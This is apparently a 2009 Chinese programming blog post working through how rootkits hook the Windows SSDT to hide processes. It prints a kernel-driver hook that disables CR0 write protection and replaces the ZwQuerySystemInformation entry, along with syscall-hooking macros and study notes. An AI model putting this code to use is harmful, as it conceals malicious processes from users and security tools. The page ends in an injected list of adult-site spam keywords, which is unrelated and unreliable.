• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            S.l.e!ep.¢%

            像打了激速一樣,以四倍的速度運轉(zhuǎn),開心的工作
            簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
            posts - 1098, comments - 335, trackbacks - 0, articles - 1
              C++博客 :: 首頁 :: 新隨筆 :: 聯(lián)系 :: 聚合  :: 管理

            HOOK SSDT Hide Process (三)

            Posted on 2009-10-25 16:06 S.l.e!ep.¢% 閱讀(492) 評論(0)  編輯 收藏 引用 所屬分類: RootKit
            前:HOOK SSDT Hide Process (二)

            [新資料] SSDT HIDE Process
            [舊資料] HOOK SSDT實現(xiàn)進(jìn)程隱藏

            舊資料中的 Hook 是如此實現(xiàn)的

            1. VOID Hook()
            2. {
            3. ? ? ? ? DbgPrint("Entry Hook()\n");
            4. ? ? ? ? OldAddress =(ULONG)KeServiceDescriptorTable->ServiceTableBase + 4*0xAd;//用windbg反匯編查到zwquerysysteminformationde
            5. ???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????//的ID號是0xADh
            6. ? ? ? ? DbgPrint("KeServiceDescriptorTable->ServiceTableBase is :0x%0x\n",KeServiceDescriptorTable->ServiceTableBase);
            7. ? ? ? ? //保存原來函數(shù)的地址
            8. ? ? ? ? OldZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION) *(ULONG *)OldAddress;
            9. ??DbgPrint("OldZwQuerySystemInformation is :0x%0x\n", OldZwQuerySystemInformation);
            10. ??DbgPrint("MyZwQuerySystemInformation is :0x%0x\n", MyZwQuerySystemInformation);
            11. ? ?//取消內(nèi)存寫保護(hù)
            12. ??_asm
            13. ??{
            14. ? ? cli
            15. ???
            16. ? ?? ?mov??eax,cr0??
            17. ? ?? ?and??eax,not 10000h
            18. ? ?? ?mov??cr0,eax
            19. ??????
            20. ??}
            21. ???
            22. ? ? ? ? *(ULONG*)OldAddress =(ULONG) MyZwQuerySystemInformation;? ?? ? //mark? ?MyZwQuerySystemInformation;
            23. ??
            24. ??//還原內(nèi)存寫保護(hù)
            25. ??_asm
            26. ??{??
            27. ??
            28. ? ? mov??eax,cr0
            29. ? ?? ?or? ?eax,10000h
            30. ? ?? ?mov??cr0,eax
            31. ? ?? ?sti
            32. ??
            33. ??
            34. ??}
            35. }

            OldAddress =(ULONG)KeServiceDescriptorTable->ServiceTableBase + 4*0xAd;
            //用windbg反匯編查到zwquerysysteminformationde的ID號是0xADh
            1. zwquerysysteminformationde的ID號是0xADh?? 這個ID是如何得來的?
            A: 用 Windbg? u 顯示 zwquerysysteminformation 所在地址都可以看到, 見Q3

            Q2. 4表示指針的大?。咳绻?64機(jī)器上就應(yīng)該是 8 了?
            A:?? 是的,所以正規(guī)寫法應(yīng)該是
            #define SYSTEMSERVICE(_function)? KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]

            Q3. 另一種寫法是
            #define SYSTEMSERVICE(_function)? KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]
            // save old system call locations
            OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));

            *(PULONG) 是地址的偏移類型, 相關(guān)于 *4, 但 PUCHAR 又是什么? _function+1 又表示什么?
            "將_Function+1即可確定ServiceID的位置,即在系統(tǒng)服務(wù)調(diào)度表中的入口地址"

            A:四個有用的宏
            SYSTEMSERVICE macro:可以獲得由ntoskrnl.exe導(dǎo)出函數(shù),以Zw*開頭函數(shù)的地址,這個函數(shù)的返回值就是Nt*函數(shù),Nt*函數(shù)的地址就在SSDT中
            SYSCALL_INDEX macro:獲得Zw*函數(shù)的地址并返回與之通信的函數(shù)在SSDT中的索引。
            這兩個宏之所以能工作,是因為所有的Zw*函數(shù)都開始于opcode:MOV eax, ULONG,這里的ULONG就是系統(tǒng)調(diào)用函數(shù)在SSDT中的索引。
            例:
            00401023????? A1 94214000??????? mov???? eax, dword ptr [402194]
            A1 表示?? ?mov eax
            94214000 表示ULONG
            所有 Zw* 開頭的函數(shù)最開始的第一條指令是? MOV eax, ULONG, 這里的ULONG就是系統(tǒng)調(diào)用函數(shù)在SSDT中的索引。
            _function 是函數(shù)地址, (PUCHAR)_function+1?? 指向 ULONG, 再把它轉(zhuǎn)成 PULONG? ,就可以拿到 系統(tǒng)調(diào)用函數(shù)在SSDT中的索引 (Nt*函數(shù)的地址)


            HOOK_SYSCALL和UNHOOK_SYSCALL macros:獲得Zw*函數(shù)的地址,取得他的索引,自動的交換SSDT中索引所對應(yīng)的函數(shù)地址和我們hook函數(shù)的地址。
            這四個宏具體是:
            #define SYSTEMSERVICE(_func)?KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_func+1)]
            ??
            #define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
            ??
            #define HOOK_SYSCALL(_Function, _Hook, _Orig )??\
            _Orig = (PVOID) InterlockedExchange( (PLONG)???\
            &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
            ??
            #define UNHOOK_SYSCALL(_Func, _Hook, _Orig )??\
            InterlockedExchange((PLONG)?\
            &MappedSystemCallTable[SYSCALL_INDEX(_Func)], (LONG) _Hook)

            Hook SSDT 其實就是把 SSDT 里面的函數(shù)地址替換成自己的處理函數(shù), 一般在 DriverEntry() 就HOOK了
            在 DriverUnload() 里再把 SSDT 里面的函數(shù)地址還原?

            在寫 KeServiceDescriptorTable.ServiceTableBase? 時有一個重要步驟
            需要去掉'內(nèi)存保護(hù)'才可以寫入
            Q:為何這個變量會受到'內(nèi)存保護(hù)'?? 受'內(nèi)存保護(hù)'的意義是?既然有辦法去掉'內(nèi)存保護(hù)',那為何還要保護(hù)呢?

            目前所知,去掉'內(nèi)存保護(hù)'有兩種方法
            1. 設(shè)置 CR0 寄存器的標(biāo)志位
            2. MDL

            Q1: 這兩種方法的區(qū)別是什么?
            Q2: MDL 的原理又是什么?

            91精品国产91久久久久福利| 7777精品伊人久久久大香线蕉| 亚洲AV无码一区东京热久久| 亚洲天堂久久久| 久久人妻无码中文字幕| 久久国产精品成人片免费| 香港aa三级久久三级| 伊人久久大香线蕉成人| 国产人久久人人人人爽| 国产毛片久久久久久国产毛片| 亚州日韩精品专区久久久| 狠狠色丁香婷婷久久综合| 97r久久精品国产99国产精| 久久99国产精品成人欧美| 精品久久久无码21p发布| 久久精品国产精品亚洲精品| 四虎久久影院| 99久久精品这里只有精品| 香蕉久久av一区二区三区| 精品久久久久久国产三级| 熟妇人妻久久中文字幕| 日韩欧美亚洲国产精品字幕久久久 | 精品国产一区二区三区久久| 久久乐国产综合亚洲精品| 久久精品国产半推半就| 精品久久人人爽天天玩人人妻| 久久精品国内一区二区三区| 亚洲精品乱码久久久久久蜜桃不卡| 国产激情久久久久影院老熟女免费 | 久久久噜噜噜久久中文字幕色伊伊| 亚洲欧美日韩中文久久| 国产精品久久久久久久人人看 | 亚洲v国产v天堂a无码久久| 青青青国产精品国产精品久久久久 | 亚洲人成无码网站久久99热国产| 99久久无码一区人妻| 精品999久久久久久中文字幕| 日韩AV无码久久一区二区| 一本色道久久综合狠狠躁| 亚洲国产成人精品91久久久| 日本高清无卡码一区二区久久|